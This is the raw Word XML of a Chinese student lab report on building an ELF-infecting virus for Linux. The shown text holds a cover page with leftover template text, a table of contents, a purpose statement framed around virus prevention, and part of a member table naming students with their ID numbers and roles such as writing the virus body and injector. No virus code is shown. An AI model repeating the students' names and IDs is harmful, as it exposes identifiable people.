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35037325"/>
        <w:docPartObj>
          <w:docPartGallery w:val="Cover Pages"/>
          <w:docPartUnique/>
        </w:docPartObj>
      </w:sdtPr>
      <w:sdtEndPr/>
      <w:sdtContent>
        <w:p w14:paraId="58B01779" w14:textId="77777777" w:rsidR="00BA4345" w:rsidRDefault="00BA4345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1AF930" wp14:editId="20D6652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文本框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BA4345" w14:paraId="1B19422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84A3A6F" w14:textId="77777777" w:rsidR="00BA4345" w:rsidRDefault="00BA434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F4E0AD0" wp14:editId="3001A77A">
                                            <wp:extent cx="3065006" cy="3831336"/>
                                            <wp:effectExtent l="0" t="0" r="2540" b="0"/>
                                            <wp:docPr id="139" name="图片 139" descr="弯道和树的图片" title="道路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标题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2B08A31" w14:textId="77777777" w:rsidR="00BA4345" w:rsidRDefault="00621A92">
                                          <w:pPr>
                                            <w:pStyle w:val="a3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ELF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病毒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副标题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9B259C9" w14:textId="77777777" w:rsidR="00BA4345" w:rsidRDefault="007D2564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A2B41A5" w14:textId="77777777" w:rsidR="00BA4345" w:rsidRDefault="00BA4345">
                                      <w:pPr>
                                        <w:pStyle w:val="a3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zh-CN"/>
                                        </w:rPr>
                                        <w:t>摘要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摘要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288237AD" w14:textId="2E259B5B" w:rsidR="00BA4345" w:rsidRDefault="00573582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通过迷人的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病毒</w:t>
                                          </w:r>
                                          <w:r w:rsidRPr="007C3C06">
                                            <w:rPr>
                                              <w:color w:val="000000" w:themeColor="text1"/>
                                            </w:rPr>
                                            <w:t>吸引您的读者。</w:t>
                                          </w:r>
                                        </w:p>
                                      </w:sdtContent>
                                    </w:sdt>
                                    <w:p w14:paraId="269EAE6F" w14:textId="77777777" w:rsidR="00621A92" w:rsidRDefault="00621A92" w:rsidP="00621A92">
                                      <w:pPr>
                                        <w:pStyle w:val="a3"/>
                                      </w:pPr>
                                    </w:p>
                                    <w:p w14:paraId="30968FD9" w14:textId="77777777" w:rsidR="00BA4345" w:rsidRDefault="008060A8">
                                      <w:pPr>
                                        <w:pStyle w:val="a3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课程"/>
                                          <w:tag w:val="课程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21A92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30BFFEE" w14:textId="77777777" w:rsidR="00BA4345" w:rsidRDefault="00BA434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71AF930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BA4345" w14:paraId="1B19422A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84A3A6F" w14:textId="77777777" w:rsidR="00BA4345" w:rsidRDefault="00BA434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F4E0AD0" wp14:editId="3001A77A">
                                      <wp:extent cx="3065006" cy="3831336"/>
                                      <wp:effectExtent l="0" t="0" r="2540" b="0"/>
                                      <wp:docPr id="139" name="图片 139" descr="弯道和树的图片" title="道路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标题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2B08A31" w14:textId="77777777" w:rsidR="00BA4345" w:rsidRDefault="00621A92">
                                    <w:pPr>
                                      <w:pStyle w:val="a3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ELF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病毒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副标题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B259C9" w14:textId="77777777" w:rsidR="00BA4345" w:rsidRDefault="007D2564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A2B41A5" w14:textId="77777777" w:rsidR="00BA4345" w:rsidRDefault="00BA4345">
                                <w:pPr>
                                  <w:pStyle w:val="a3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zh-CN"/>
                                  </w:rPr>
                                  <w:t>摘要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摘要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88237AD" w14:textId="2E259B5B" w:rsidR="00BA4345" w:rsidRDefault="00573582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通过迷人的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病毒</w:t>
                                    </w:r>
                                    <w:r w:rsidRPr="007C3C06">
                                      <w:rPr>
                                        <w:color w:val="000000" w:themeColor="text1"/>
                                      </w:rPr>
                                      <w:t>吸引您的读者。</w:t>
                                    </w:r>
                                  </w:p>
                                </w:sdtContent>
                              </w:sdt>
                              <w:p w14:paraId="269EAE6F" w14:textId="77777777" w:rsidR="00621A92" w:rsidRDefault="00621A92" w:rsidP="00621A92">
                                <w:pPr>
                                  <w:pStyle w:val="a3"/>
                                </w:pPr>
                              </w:p>
                              <w:p w14:paraId="30968FD9" w14:textId="77777777" w:rsidR="00BA4345" w:rsidRDefault="008060A8">
                                <w:pPr>
                                  <w:pStyle w:val="a3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课程"/>
                                    <w:tag w:val="课程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1A92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30BFFEE" w14:textId="77777777" w:rsidR="00BA4345" w:rsidRDefault="00BA434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01064582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76815226" w14:textId="77777777" w:rsidR="00EF66D6" w:rsidRPr="00460500" w:rsidRDefault="00EF66D6">
          <w:pPr>
            <w:pStyle w:val="TOC"/>
            <w:rPr>
              <w:sz w:val="56"/>
            </w:rPr>
          </w:pPr>
          <w:r w:rsidRPr="00460500">
            <w:rPr>
              <w:sz w:val="56"/>
              <w:lang w:val="zh-CN"/>
            </w:rPr>
            <w:t>目录</w:t>
          </w:r>
        </w:p>
        <w:p w14:paraId="5A3969CC" w14:textId="77777777" w:rsidR="00460500" w:rsidRDefault="00460500" w:rsidP="00EF66D6">
          <w:pPr>
            <w:pStyle w:val="11"/>
            <w:rPr>
              <w:b/>
              <w:bCs/>
            </w:rPr>
          </w:pPr>
        </w:p>
        <w:p w14:paraId="679CA9D3" w14:textId="77777777" w:rsidR="00EF66D6" w:rsidRPr="00460500" w:rsidRDefault="00EF66D6" w:rsidP="00EF66D6">
          <w:pPr>
            <w:pStyle w:val="11"/>
            <w:rPr>
              <w:b/>
              <w:bCs/>
              <w:sz w:val="28"/>
              <w:lang w:val="zh-CN"/>
            </w:rPr>
          </w:pPr>
          <w:r w:rsidRPr="00460500">
            <w:rPr>
              <w:rFonts w:hint="eastAsia"/>
              <w:b/>
              <w:bCs/>
              <w:sz w:val="28"/>
            </w:rPr>
            <w:t>实验目的</w:t>
          </w:r>
          <w:r w:rsidRPr="00460500">
            <w:rPr>
              <w:sz w:val="28"/>
            </w:rPr>
            <w:ptab w:relativeTo="margin" w:alignment="right" w:leader="dot"/>
          </w:r>
          <w:r w:rsidR="0052188B" w:rsidRPr="00460500">
            <w:rPr>
              <w:b/>
              <w:bCs/>
              <w:sz w:val="28"/>
              <w:lang w:val="zh-CN"/>
            </w:rPr>
            <w:t>1</w:t>
          </w:r>
        </w:p>
        <w:p w14:paraId="002BE104" w14:textId="77777777" w:rsidR="0052188B" w:rsidRPr="00460500" w:rsidRDefault="0052188B" w:rsidP="0052188B">
          <w:pPr>
            <w:rPr>
              <w:sz w:val="24"/>
              <w:lang w:val="zh-CN"/>
            </w:rPr>
          </w:pPr>
        </w:p>
        <w:p w14:paraId="2E64165E" w14:textId="77777777" w:rsidR="00EF66D6" w:rsidRPr="00460500" w:rsidRDefault="00EF66D6" w:rsidP="00EF66D6">
          <w:pPr>
            <w:pStyle w:val="11"/>
            <w:rPr>
              <w:b/>
              <w:bCs/>
              <w:sz w:val="28"/>
              <w:lang w:val="zh-CN"/>
            </w:rPr>
          </w:pPr>
          <w:r w:rsidRPr="00F266B9">
            <w:rPr>
              <w:rFonts w:hint="eastAsia"/>
              <w:b/>
              <w:sz w:val="28"/>
            </w:rPr>
            <w:t>组内人员</w:t>
          </w:r>
          <w:r w:rsidRPr="00460500">
            <w:rPr>
              <w:sz w:val="28"/>
            </w:rPr>
            <w:ptab w:relativeTo="margin" w:alignment="right" w:leader="dot"/>
          </w:r>
          <w:r w:rsidR="0052188B" w:rsidRPr="00460500">
            <w:rPr>
              <w:b/>
              <w:bCs/>
              <w:sz w:val="28"/>
              <w:lang w:val="zh-CN"/>
            </w:rPr>
            <w:t>1</w:t>
          </w:r>
        </w:p>
        <w:p w14:paraId="50BAEBAA" w14:textId="77777777" w:rsidR="0052188B" w:rsidRPr="00460500" w:rsidRDefault="0052188B" w:rsidP="0052188B">
          <w:pPr>
            <w:rPr>
              <w:sz w:val="24"/>
              <w:lang w:val="zh-CN"/>
            </w:rPr>
          </w:pPr>
        </w:p>
        <w:p w14:paraId="2DEFC6FB" w14:textId="77777777" w:rsidR="00EF66D6" w:rsidRPr="00460500" w:rsidRDefault="00EF66D6">
          <w:pPr>
            <w:pStyle w:val="11"/>
            <w:rPr>
              <w:b/>
              <w:bCs/>
              <w:sz w:val="28"/>
              <w:lang w:val="zh-CN"/>
            </w:rPr>
          </w:pPr>
          <w:r w:rsidRPr="00460500">
            <w:rPr>
              <w:rFonts w:hint="eastAsia"/>
              <w:b/>
              <w:bCs/>
              <w:sz w:val="28"/>
            </w:rPr>
            <w:t>病毒原理</w:t>
          </w:r>
          <w:r w:rsidRPr="00460500">
            <w:rPr>
              <w:sz w:val="28"/>
            </w:rPr>
            <w:ptab w:relativeTo="margin" w:alignment="right" w:leader="dot"/>
          </w:r>
          <w:r w:rsidR="0052188B" w:rsidRPr="00460500">
            <w:rPr>
              <w:b/>
              <w:bCs/>
              <w:sz w:val="28"/>
              <w:lang w:val="zh-CN"/>
            </w:rPr>
            <w:t>2</w:t>
          </w:r>
        </w:p>
        <w:p w14:paraId="62B14613" w14:textId="77777777" w:rsidR="00EF66D6" w:rsidRPr="00F266B9" w:rsidRDefault="00602760" w:rsidP="00F266B9">
          <w:pPr>
            <w:pStyle w:val="2"/>
            <w:ind w:left="0" w:firstLine="420"/>
            <w:rPr>
              <w:rFonts w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia"/>
              <w:sz w:val="24"/>
              <w:szCs w:val="24"/>
              <w:lang w:val="zh-CN"/>
            </w:rPr>
          </w:pPr>
          <w:r w:rsidRPr="00F266B9">
            <w:rPr>
              <w:rFonts w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia" w:hint="eastAsia"/>
              <w:sz w:val="24"/>
              <w:szCs w:val="24"/>
              <w:lang w:val="zh-CN"/>
            </w:rPr>
            <w:t>E</w:t>
          </w:r>
          <w:r w:rsidRPr="00F266B9">
            <w:rPr>
              <w:rFonts w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia"/>
              <w:sz w:val="24"/>
              <w:szCs w:val="24"/>
              <w:lang w:val="zh-CN"/>
            </w:rPr>
            <w:t>LF</w:t>
          </w:r>
          <w:r w:rsidRPr="00F266B9">
            <w:rPr>
              <w:rFonts w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia" w:hint="eastAsia"/>
              <w:sz w:val="24"/>
              <w:szCs w:val="24"/>
              <w:lang w:val="zh-CN"/>
            </w:rPr>
            <w:t>文件简介</w:t>
          </w:r>
          <w:r w:rsidR="00EF66D6" w:rsidRPr="00F266B9">
            <w:rPr>
              <w:rFonts w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia"/>
              <w:sz w:val="24"/>
              <w:szCs w:val="24"/>
            </w:rPr>
            <w:ptab w:relativeTo="margin" w:alignment="right" w:leader="dot"/>
          </w:r>
          <w:r w:rsidR="0052188B" w:rsidRPr="00F266B9">
            <w:rPr>
              <w:rFonts w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia"/>
              <w:sz w:val="24"/>
              <w:szCs w:val="24"/>
              <w:lang w:val="zh-CN"/>
            </w:rPr>
            <w:t>2</w:t>
          </w:r>
        </w:p>
        <w:p w14:paraId="45DA3E43" w14:textId="77777777" w:rsidR="00602760" w:rsidRPr="00F266B9" w:rsidRDefault="00602760" w:rsidP="00602760">
          <w:pPr>
            <w:rPr>
              <w:rFonts w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia"/>
              <w:sz w:val="24"/>
              <w:szCs w:val="24"/>
              <w:lang w:val="zh-CN"/>
            </w:rPr>
          </w:pPr>
          <w:r w:rsidRPr="00F266B9">
            <w:rPr>
              <w:rFonts w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia" w:hint="eastAsia"/>
              <w:sz w:val="24"/>
              <w:szCs w:val="24"/>
              <w:lang w:val="zh-CN"/>
            </w:rPr>
            <w:t xml:space="preserve">  </w:t>
          </w:r>
          <w:r w:rsidR="00F266B9" w:rsidRPr="00F266B9">
            <w:rPr>
              <w:rFonts w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia"/>
              <w:sz w:val="24"/>
              <w:szCs w:val="24"/>
              <w:lang w:val="zh-CN"/>
            </w:rPr>
            <w:tab/>
          </w:r>
          <w:r w:rsidRPr="00F266B9">
            <w:rPr>
              <w:rFonts w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia" w:hint="eastAsia"/>
              <w:sz w:val="24"/>
              <w:szCs w:val="24"/>
            </w:rPr>
            <w:t>病毒</w:t>
          </w:r>
          <w:r w:rsidR="0052188B" w:rsidRPr="00F266B9">
            <w:rPr>
              <w:rFonts w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia" w:hint="eastAsia"/>
              <w:sz w:val="24"/>
              <w:szCs w:val="24"/>
            </w:rPr>
            <w:t>工作原理</w:t>
          </w:r>
          <w:r w:rsidRPr="00F266B9">
            <w:rPr>
              <w:rFonts w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia"/>
              <w:sz w:val="24"/>
              <w:szCs w:val="24"/>
            </w:rPr>
            <w:ptab w:relativeTo="margin" w:alignment="right" w:leader="dot"/>
          </w:r>
          <w:r w:rsidR="0052188B" w:rsidRPr="00F266B9">
            <w:rPr>
              <w:rFonts w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia"/>
              <w:sz w:val="24"/>
              <w:szCs w:val="24"/>
              <w:lang w:val="zh-CN"/>
            </w:rPr>
            <w:t>2</w:t>
          </w:r>
        </w:p>
        <w:p w14:paraId="609377BD" w14:textId="77777777" w:rsidR="0052188B" w:rsidRPr="00460500" w:rsidRDefault="0052188B" w:rsidP="00602760">
          <w:pPr>
            <w:rPr>
              <w:sz w:val="24"/>
              <w:lang w:val="zh-CN"/>
            </w:rPr>
          </w:pPr>
        </w:p>
        <w:p w14:paraId="146580FA" w14:textId="77777777" w:rsidR="00EF66D6" w:rsidRPr="00460500" w:rsidRDefault="00EF66D6" w:rsidP="00EF66D6">
          <w:pPr>
            <w:pStyle w:val="2"/>
            <w:ind w:left="0"/>
            <w:rPr>
              <w:sz w:val="28"/>
              <w:lang w:val="zh-CN"/>
            </w:rPr>
          </w:pPr>
          <w:r w:rsidRPr="00F266B9">
            <w:rPr>
              <w:rFonts w:hint="eastAsia"/>
              <w:b/>
              <w:sz w:val="28"/>
            </w:rPr>
            <w:t>实现的功能</w:t>
          </w:r>
          <w:r w:rsidRPr="00460500">
            <w:rPr>
              <w:sz w:val="28"/>
            </w:rPr>
            <w:ptab w:relativeTo="margin" w:alignment="right" w:leader="dot"/>
          </w:r>
          <w:r w:rsidRPr="00460500">
            <w:rPr>
              <w:sz w:val="28"/>
              <w:lang w:val="zh-CN"/>
            </w:rPr>
            <w:t>5</w:t>
          </w:r>
        </w:p>
        <w:p w14:paraId="1511BF34" w14:textId="77777777" w:rsidR="0052188B" w:rsidRPr="00460500" w:rsidRDefault="0052188B" w:rsidP="00EF66D6">
          <w:pPr>
            <w:pStyle w:val="2"/>
            <w:ind w:left="0"/>
            <w:rPr>
              <w:sz w:val="28"/>
            </w:rPr>
          </w:pPr>
        </w:p>
        <w:p w14:paraId="64E0F333" w14:textId="77777777" w:rsidR="00EF66D6" w:rsidRPr="00460500" w:rsidRDefault="00EF66D6" w:rsidP="00EF66D6">
          <w:pPr>
            <w:pStyle w:val="2"/>
            <w:ind w:left="0"/>
            <w:rPr>
              <w:sz w:val="28"/>
              <w:lang w:val="zh-CN"/>
            </w:rPr>
          </w:pPr>
          <w:r w:rsidRPr="00F266B9">
            <w:rPr>
              <w:rFonts w:hint="eastAsia"/>
              <w:b/>
              <w:sz w:val="28"/>
            </w:rPr>
            <w:t>实现分析</w:t>
          </w:r>
          <w:r w:rsidRPr="00460500">
            <w:rPr>
              <w:sz w:val="28"/>
            </w:rPr>
            <w:ptab w:relativeTo="margin" w:alignment="right" w:leader="dot"/>
          </w:r>
          <w:r w:rsidRPr="00460500">
            <w:rPr>
              <w:sz w:val="28"/>
              <w:lang w:val="zh-CN"/>
            </w:rPr>
            <w:t>6</w:t>
          </w:r>
        </w:p>
        <w:p w14:paraId="24DEC60B" w14:textId="77777777" w:rsidR="0052188B" w:rsidRPr="00460500" w:rsidRDefault="0052188B" w:rsidP="00EF66D6">
          <w:pPr>
            <w:pStyle w:val="2"/>
            <w:ind w:left="0"/>
            <w:rPr>
              <w:sz w:val="28"/>
            </w:rPr>
          </w:pPr>
        </w:p>
        <w:p w14:paraId="116057A9" w14:textId="77777777" w:rsidR="00EF66D6" w:rsidRPr="00460500" w:rsidRDefault="00CC3687" w:rsidP="00EF66D6">
          <w:pPr>
            <w:pStyle w:val="2"/>
            <w:ind w:left="0"/>
            <w:rPr>
              <w:sz w:val="28"/>
              <w:lang w:val="zh-CN"/>
            </w:rPr>
          </w:pPr>
          <w:r w:rsidRPr="00F266B9">
            <w:rPr>
              <w:rFonts w:hint="eastAsia"/>
              <w:b/>
              <w:sz w:val="28"/>
            </w:rPr>
            <w:t>实验演示</w:t>
          </w:r>
          <w:r w:rsidR="00EF66D6" w:rsidRPr="00460500">
            <w:rPr>
              <w:sz w:val="28"/>
            </w:rPr>
            <w:ptab w:relativeTo="margin" w:alignment="right" w:leader="dot"/>
          </w:r>
          <w:r w:rsidR="00EF66D6" w:rsidRPr="00460500">
            <w:rPr>
              <w:sz w:val="28"/>
              <w:lang w:val="zh-CN"/>
            </w:rPr>
            <w:t>6</w:t>
          </w:r>
        </w:p>
        <w:p w14:paraId="380FA2B2" w14:textId="77777777" w:rsidR="0052188B" w:rsidRPr="00460500" w:rsidRDefault="0052188B" w:rsidP="00CC3687">
          <w:pPr>
            <w:pStyle w:val="11"/>
            <w:rPr>
              <w:sz w:val="28"/>
            </w:rPr>
          </w:pPr>
        </w:p>
        <w:p w14:paraId="4AE15843" w14:textId="77777777" w:rsidR="00CC3687" w:rsidRPr="00460500" w:rsidRDefault="00CC3687" w:rsidP="00CC3687">
          <w:pPr>
            <w:pStyle w:val="11"/>
            <w:rPr>
              <w:sz w:val="28"/>
            </w:rPr>
          </w:pPr>
          <w:r w:rsidRPr="00460500">
            <w:rPr>
              <w:rFonts w:hint="eastAsia"/>
              <w:sz w:val="28"/>
            </w:rPr>
            <w:t>附录</w:t>
          </w:r>
          <w:r w:rsidRPr="00460500">
            <w:rPr>
              <w:sz w:val="28"/>
            </w:rPr>
            <w:ptab w:relativeTo="margin" w:alignment="right" w:leader="dot"/>
          </w:r>
          <w:r w:rsidRPr="00460500">
            <w:rPr>
              <w:b/>
              <w:bCs/>
              <w:sz w:val="28"/>
              <w:lang w:val="zh-CN"/>
            </w:rPr>
            <w:t>4</w:t>
          </w:r>
        </w:p>
        <w:p w14:paraId="4203D4C3" w14:textId="77777777" w:rsidR="00EF66D6" w:rsidRPr="00460500" w:rsidRDefault="008060A8" w:rsidP="00EF66D6">
          <w:pPr>
            <w:rPr>
              <w:sz w:val="24"/>
              <w:lang w:val="zh-CN"/>
            </w:rPr>
          </w:pPr>
        </w:p>
      </w:sdtContent>
    </w:sdt>
    <w:p w14:paraId="28060F30" w14:textId="77777777" w:rsidR="00CC3687" w:rsidRPr="00460500" w:rsidRDefault="00CC3687">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="0B816FD2" w14:textId="77777777" w:rsidR="00CC3687" w:rsidRDefault="00CC3687">
      <w:pPr>
        <w:widowControl/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:br w:type="page"/>
      </w:r>
    </w:p>
    <w:p w14:paraId="7FAB746C" w14:textId="77777777" w:rsidR="000A47A3" w:rsidRDefault="00CC3687">
      <w:pPr>
        <w:rPr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66B9">
        <w:rPr>
          <w:rFonts w:hint="eastAsia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实验目的</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6F9E48B8" w14:textId="77777777" w:rsidR="00F266B9" w:rsidRPr="00F266B9" w:rsidRDefault="00F266B9">
      <w:pPr>
        <w:rPr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58B3DB" w14:textId="77777777" w:rsidR="00CC3687" w:rsidRPr="003A089F" w:rsidRDefault="00CC3687" w:rsidP="00F266B9">
      <w:pPr>
        <w:ind w:firstLine="420"/>
        <w:rPr>
          <w:rFonts w:ascii="微软雅黑" w:eastAsia="微软雅黑" w:hAnsi="微软雅黑"/>
          <w:sz w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="003A089F">
        <w:rPr>
          <w:rFonts w:ascii="微软雅黑" w:eastAsia="微软雅黑" w:hAnsi="微软雅黑" w:hint="eastAsia"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>长时间以来，计算机病毒一直是一种威胁计算机安全的来源之一。 当计算机受到病毒感染后， 病毒会长期驻留在计算机内部并不断感染计算机内部的各种文件，甚至有可能经网络扩散。在满足发作条件时病毒发作，占用系统资源，</w:t>
      </w:r>
      <w:r w:rsidR="00B75BA0" w:rsidRPr="003A089F">
        <w:rPr>
          <w:rFonts w:ascii="微软雅黑" w:eastAsia="微软雅黑" w:hAnsi="微软雅黑" w:hint="eastAsia"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>窃取用户数据，破坏系统文件。有些病毒极为隐蔽，潜伏期长，繁殖能力极强，让系统用户束手无策。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="33F89986" w14:textId="77777777" w:rsidR="00B75BA0" w:rsidRPr="003A089F" w:rsidRDefault="00B75BA0" w:rsidP="00F266B9">
      <w:pPr>
        <w:ind w:firstLine="420"/>
        <w:rPr>
          <w:rFonts w:ascii="微软雅黑" w:eastAsia="微软雅黑" w:hAnsi="微软雅黑"/>
          <w:sz w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="003A089F">
        <w:rPr>
          <w:rFonts w:ascii="微软雅黑" w:eastAsia="微软雅黑" w:hAnsi="微软雅黑" w:hint="eastAsia"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>本实验通过模拟LINUX系统环境中的ELF文件感染病毒的感染过程，了解病毒的构造，性质，原理，为linux系统的病毒防治提供帮助</w:t>
      </w:r>
      <w:r w:rsidR="00602760" w:rsidRPr="003A089F">
        <w:rPr>
          <w:rFonts w:ascii="微软雅黑" w:eastAsia="微软雅黑" w:hAnsi="微软雅黑" w:hint="eastAsia"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="63266FA9" w14:textId="77777777" w:rsidR="00602760" w:rsidRDefault="00602760"/>
    <w:p w14:paraId="54969942" w14:textId="77777777" w:rsidR="00602760" w:rsidRDefault="00602760"/>
    <w:p w14:paraId="30826446" w14:textId="77777777" w:rsidR="00602760" w:rsidRDefault="00602760"/>
    <w:p w14:paraId="154DAF78" w14:textId="77777777" w:rsidR="00602760" w:rsidRDefault="00602760"/>
    <w:p w14:paraId="6051407F" w14:textId="77777777" w:rsidR="00602760" w:rsidRDefault="00602760"/>
    <w:p w14:paraId="282420EE" w14:textId="77777777" w:rsidR="00602760" w:rsidRDefault="00602760"/>
    <w:p w14:paraId="0D10074E" w14:textId="77777777" w:rsidR="00602760" w:rsidRDefault="00602760">
      <w:pPr>
        <w:rPr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66B9">
        <w:rPr>
          <w:rFonts w:hint="eastAsia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组内人员</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3AF501B2" w14:textId="77777777" w:rsidR="00F266B9" w:rsidRPr="00F266B9" w:rsidRDefault="00F266B9">
      <w:pPr>
        <w:rPr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1271"/>
        <w:gridCol w:w="1985"/>
        <w:gridCol w:w="6237"/>
      </w:tblGrid>
      <w:tr w:rsidR="00EA27AC" w14:paraId="2C1758C3" w14:textId="4F3215B7" w:rsidTr="00F169E7">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1271" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="644ED2A4" w14:textId="77777777" w:rsidR="00EA27AC" w:rsidRDefault="00EA27AC" w:rsidP="00F266B9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姓名</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1985" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="3EF3DAA2" w14:textId="77777777" w:rsidR="00EA27AC" w:rsidRDefault="00EA27AC" w:rsidP="00F266B9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学号</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="6237" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="4F77F3C2" w14:textId="539B07E8" w:rsidR="00EA27AC" w:rsidRDefault="00F169E7" w:rsidP="00F266B9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分工</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00EA27AC" w14:paraId="6A44817B" w14:textId="47CF30FE" w:rsidTr="00F169E7">
        <w:trPr>
          <w:trHeight w:val="633"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1271" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="16B4F780" w14:textId="77777777" w:rsidR="00EA27AC" w:rsidRDefault="00EA27AC" w:rsidP="00F266B9">
            <w:pPr>
              <w:rPr>
                <w:sz w:val="28"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00F266B9">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
                <w:sz w:val="28"/>
              </w:rPr>
              <w:t>谢天成</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1985" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="3787A7FE" w14:textId="10F8F58F" w:rsidR="00EA27AC" w:rsidRDefault="00EA27AC" w:rsidP="00F266B9">
            <w:pPr>
              <w:rPr>
                <w:sz w:val="28"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="28"/>
              </w:rPr>
              <w:t>5140309234</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="6237" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="7297601B" w14:textId="0FCF2392" w:rsidR="00EA27AC" w:rsidRDefault="00F169E7" w:rsidP="00F266B9">
            <w:pPr>
              <w:rPr>
                <w:sz w:val="28"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00F169E7">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
                <w:sz w:val="28"/>
              </w:rPr>
              <w:t>病毒体编写，接口设计与代码整合，汇编代码压缩</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00EA27AC" w14:paraId="60CFB80A" w14:textId="344ED1DD" w:rsidTr="00F169E7">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1271" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="61282D17" w14:textId="77777777" w:rsidR="00EA27AC" w:rsidRDefault="00EA27AC" w:rsidP="00F266B9">
            <w:pPr>
              <w:rPr>
                <w:sz w:val="28"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00F266B9">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
                <w:sz w:val="28"/>
              </w:rPr>
              <w:t>徐世超</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1985" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="5D56AA4A" w14:textId="63FA3610" w:rsidR="00EA27AC" w:rsidRPr="008B38C3" w:rsidRDefault="00EA27AC" w:rsidP="008B38C3">
            <w:pPr>
              <w:widowControl/>
              <w:rPr>
                <w:sz w:val="28"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="008B38C3">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
                <w:sz w:val="28"/>
              </w:rPr>
              <w:t>5140309569</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="6237" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="4ED5CE0C" w14:textId="6A5B72CA" w:rsidR="00EA27AC" w:rsidRPr="008B38C3" w:rsidRDefault="00F169E7" w:rsidP="008B38C3">
            <w:pPr>
              <w:widowControl/>
              <w:rPr>
                <w:sz w:val="28"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00F169E7">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
                <w:sz w:val="28"/>
              </w:rPr>
              <w:t>思路设计，病毒注入器编写，报告撰写</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00EA27AC" w14:paraId="62817F9C" w14:textId="7B4E7620" w:rsidTr="00F169E7">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1271" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="1BD44BB3" w14:textId="77777777" w:rsidR="00EA27AC" w:rsidRDefault="00EA27AC" w:rsidP="00F266B9">
            <w:pPr>
              <w:rPr>
                <w:sz w:val="28"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00F266B9">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
                <w:sz w:val="28"/>
              </w:rPr>
              <w:t>蒲逸飞</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1985" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="3A68D35E" w14:textId="1C3133EC" w:rsidR="00EA27AC" w:rsidRPr="008B38C3" w:rsidRDefault="00EA27AC" w:rsidP="008B38C3">
            <w:pPr>
              <w:widowControl/>
              <w:rPr>
                <w:sz w:val="28"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="008B38C3">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
                <w:sz w:val="28"/>
              </w:rPr>
              <w:t>5140309573</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="6237" w:type="dxa"/>
          </w:tcPr>
